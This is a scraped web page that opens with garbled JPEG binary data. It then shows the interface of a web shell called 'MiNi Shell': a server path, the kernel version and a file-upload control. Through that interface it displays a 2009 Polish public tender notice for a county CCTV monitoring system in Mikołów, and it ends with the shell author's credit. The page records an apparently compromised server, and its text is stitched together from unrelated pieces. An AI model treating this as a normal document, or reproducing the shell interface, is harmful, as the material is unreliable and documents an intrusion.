JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091005/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091005/169061-N-2009.html

<p class="kh_header"><b>Mikołów: Budowa systemu monitoringu wizyjnego na terenie Powiatu Mikołowskiego w ramach realizacji projektu:  Elektroniczny Strażnik - wprowadzenie skutecznych metod i środków technicznego zabezpieczenia mienia w miejscach publicznych poprzez stworzenie systemu wizyjnego na terenie Powiatu Mikołowskiego , dofinansowanego ze środków rezerwy celowej Ministerstwa Spraw Wewnętrznych i Administracji w ramach rządowego programu ograniczenia przestępczości i aspołecznych zachowań -Razem Bezpieczniej.</b><br>
<b>Numer ogłoszenia: 169061 - 2009; data zamieszczenia: 05.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.mikolow.bipgov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa systemu monitoringu wizyjnego na terenie Powiatu Mikołowskiego w ramach realizacji projektu:  Elektroniczny Strażnik - wprowadzenie skutecznych metod i środków technicznego zabezpieczenia mienia w miejscach publicznych poprzez stworzenie systemu wizyjnego na terenie Powiatu Mikołowskiego , dofinansowanego ze środków rezerwy celowej Ministerstwa Spraw Wewnętrznych i Administracji w ramach rządowego programu ograniczenia przestępczości i aspołecznych zachowań -Razem Bezpieczniej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  i zakresem zamówienia jest: Budowa systemu monitoringu wizyjnego na terenie Powiatu Mikołowskiego w ramach realizacji projektu:  Elektroniczny Strażnik - wprowadzenie skutecznych metod i środków technicznego zabezpieczenia mienia w miejscach publicznych poprzez stworzenie systemu wizyjnego na terenie Powiatu Mikołowskiego , dofinansowanego ze środków rezerwy celowej Ministerstwa Spraw Wewnętrznych i Admninistarcji w ramach rządowego programu ograniczenia przestępczości i aspołecznych zachowań -Razem Bezpieczniej.
Przedmiot zamówienia dotyczy realizacji Projektu systemu monitoringu wizyjnego na terenie Powiatu Mikołowskiego w ramach projektu Elektroniczny Strażnik. System dozoru wizyjnego  Powiatu Mikołowskiego ma za zadanie wspierać ochronę mienia publicznego oraz jest istotnym  czynnikiem prewencyjnym ograniczającym przestępczość we wskazanych punktach powiatu.
System zbudowany będzie z 13 zewnętrznych kamer szybkoobrotowych oraz 15 zewnętrznych kamer stałych rozlokowanych w niżej wymienionych gminach:
    - Mikołów         -   2 kamery obrotowe, 4 kamery stałe,
    - Łaziska Górne -  5 kamer obrotowych, 5 kamer stałych,
    - Orzesze           -   2 kamery obrotowe, 2 kamery stałe,
    - Ornontowice   -   2 kamery obrotowe, 2 kamery stałe,
    - Wyry               -   2 kamery obrotowe, 2 kamery stałe.
Obraz z kamer, przetwarzany cyfrowo, będzie przekazywany do Centrum Monitoringu, wyposażonego w dwa komputery klasy PC z systemem operacyjnym Microsoft Windows XP, usytuowanego na stanowisku dyspozytorskim Powiatowego Centrum Zarządzania Kryzysowego w Mikołowie, ulica Prusa 7. Jako medium transmisyjne docelowo ma zostać użyta budowana obecnie sieć informatyczna Silesia-Net oparta o technikę światłowodową. System do czasu uruchomienia sieci Silesia-Net będzie pracował  w oparciu o istniejące gminne i powiatowe łącza informatyczne do sieci Internet oraz dostęp do sieci za pośrednictwem operatorów zewnętrznych oraz liniami radiowymi.
Zakres rzeczowy zamówienia obejmuje :
a) zakup urządzeń i oprogramowania do realizacji projektu określonego w pkt. 8 Specyfikacja  techniczna urządzeń i oprogramowania (str. 14-24) Projektu systemu monitoringu; 
b) wykonanie zakresu prac obejmujących:
  - montaż kamer szybkoobrotowych i stałych na istniejących obiektach budowlanych;
 - dostawę, montaż i konfigurację wyposażenia z Centrum Monitorowania wraz z niezbędnym oprogramowaniem do rejestracji obrazów oraz zarządzania systemem;
 -budowa przyłączy dla zasilania kamer;
c) sporządzenie dokumentacji powykonawczej dla systemu monitoringu - sześć egzemplarzy;
d) przeszkolenie wyznaczonych dyspozytorów PCZK w zakresie obsługi, nadzoru 
 i administracji wybudowanego systemu monitoringu; Zamawiający przewiduje przeszkolenie 6 osób ; przewidywana liczba godzin szkolenia - 6 godzin zegarowych. Harmonogram szkolenia zostanie ustalony z wybranym Wykonawcą.
 e) świadczenie nieodpłatnych usług serwisowych w okresie gwarancji obejmujących:
 - przeprowadzanie napraw i innych usług serwisowych,
 f) w przypadku awarii sprzętu  Wykonawca  przystąpi do jego naprawy do końca następnego dnia roboczego od momentu zgłoszenia awarii za pośrednictwem faksu, poczty e-mail lub w formie pisemnej a usunięcie awarii  nastąpi w ciągu 7 dni od zgłoszenia. Usługa obowiązuje przez okres 36 miesięcy  licząc od dnia podpisania protokołu odbioru końcowego.
Wykonawca zobowiazany jest do udzielenia  36 miesięcznego okresu gwarancji na całość przedmiotu zamówienia i 24 - miesięcznego okresu rękojmi. Stosowne oświadczenie Wykonawca musi złożyć w formularzu ofertowym.
Szczegółowy zakres rzeczowy zamówienia określa:
-   projekt budowlano - wykonawczy (zał. nr 2 do SIWZ) 
-   specyfikacje techniczne  wykonania i odbioru robót budowlanych (zał. nr 3 do SIWZ)
-   przedmiar robót  (zał. nr 4 do SIWZ)
-   zestawienie materiałów ( zał. nr 4a do SIWZ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 48.32.90.00-0, 32.32.35.00-8, 34.97.10.00-4, 45.31.70.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
a)nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zmianami ),
b)spełniają warunki określone w art. 22 ust. 1 Ustawy z dnia 29.01.2004r. Prawo zamówień publicznych,
c) wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres  prowadzenia działalności jest krótszy- w tym okresie, minimum 1 zamówienie na roboty  odpowiadające swoim rodzajem  robotom   stanowiącym przedmiot  zamówienia, o wartości  minimum 130 000,00 zł (brutto); );  pod pojęciem, robót odpowiadających swoim rodzajem  przedmiotowi zamówienia-  Zamawiający uznaje: roboty polegajace na budowie systemu monitoringu wizyjnego w technologii przesyłu    światłowodami lub łączami internetowymi lub liniami radiowymi.
d) dysponują lub będą dysponować minimum 1 osobą posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi o specjalności instalacyjnej: w zakresie sieci , instalacji i urządzeń elektrycznych; 
e) osoba o której mowa w pkt. 3 d)  musi posiadać aktualne zaświadczenie o wpisie do właściwej izby samorządu zawodowego i właściwe uprawnienia,

Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania.
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w pkt. 17 SIWZ i zostanie przeprowadzona zgodnie z formułą - spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą musi złożyć następujące  dokumenty i oświadczenia konieczne do przeprowadzenie postępowania oraz potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu: 
a)wypełniony i podpisany formularz ofertowy wraz z oświadczeniem z art. 22 ust.1 Prawa zamówień publicznych (na załączonym druku nr 1),
b)wykaz wykonanych  przez wykonawcę w okresie  ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 roboty , odpowiadającej swoim rodzajem  robotom  stanowiącym przedmiot  zamówienia, o wartości  minimum  130 000,00 zł (brutto); wypełnić zał. nr 5 do SIWZ;
c)dokumenty potwierdzające wykonanie robót o których mowa w zał. nr 5 do SIWZ , należycie;   np.  referencja ,  protokół  odbioru końcowego wykonanych robót;
d) wykaz  osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia posiadających uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej: w zakresie sieci , instalacji i urządzeń elektrycznych;  wypełnić zał. nr  6 do SIWZ;
e)pisemne zobowiązanie innych podmiotów do udostępnienia osób o których mowa w pkt.17 ppkt.d SIWZ, jeżeli w załączonym  wykazie ( zał. nr 6 do SIWZ)  wykonawca wskazał osoby, którymi będzie dysponował;
f)dokumenty  potwierdzające uprawnienia zawodowe, zgodnie z podanym wykazem osób   w załączniku nr  6 do SIWZ,
g)aktualny dokument potwierdzający wpis osób wymienionych w zał. nr 6 do SIWZ do właściwej izby samorządu zawodowego,
h)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
Uwaga! Z dokumentu określonego w pkt. 17 ppkt. h) musi wynikać zakres działalności wykonawcy, sposób reprezentacji wykonawcy, osoby które są uprawnione do reprezentowania wykonawcy na zewnątrz oraz składania oświadczeń woli w jego imieniu.  
Uwaga!  Dokument określony w pkt. 17 ppkt. h) SIWZ uważa się za aktualny jeżeli został wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
i)aktualne zaświadczenie właściwego naczelnika  urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie  w całości wykonania decyzji właściwego organu;
Uwaga! Zaświadczenie z urzędu skarbowego uważa się za aktualne jeżeli zostało wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
Oferta zostanie odrzucona, gdy wystąpi jedna z okoliczności przewidzianych w art. 89 ust. 1 ustawy Prawo zamówień publicznych.
	Uwaga ! 
Dokumenty określone w pkt. 17 należy składać w oryginale   lub  kopii potwierdzonej za zgodność z oryginałem przez Wykonawcę.  W przypadku złożenia dokumentów jako  kopii,  należy  na  tym   dokumencie wprowadzić zapis:  potwierdzam za zgodność z oryginałem , datę potwierdzenia  kopii i podpis wykonawcy.
 Wszystkie dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski  poświadczonym przez wykonawcę. W przypadku wezwania Wykonawcy do uzupełnienia oferty zgodnie z art.26 ust.3 ustawy Prawo zamówień publicznych dokumenty te muszą zostać złożone w  takiej samej  formie jak wskazano powyżej.  
Postanowienia dotyczące wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
	1. jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, w miejsce dokumentów o których mowa w pkt. 17 ppkt. ,h, i, składa dokumenty wystawione w  kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.                          
2.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sp.mikolow.bipgov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Żwirki i Wigury 4a, 43-190 Mikołów, wejście B, biuro podawcze; osobiście lub za zaliczeniem pocztowym: cena 70 PLN plus koszt wysyłki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2009 godzina 09:00, miejsce: Starostwo Powiatowe, ul. Żwirki i Wigury 4a, 43 -190 Mikołów, wejście A, I piętro, pokój 211 - kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 24.11.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com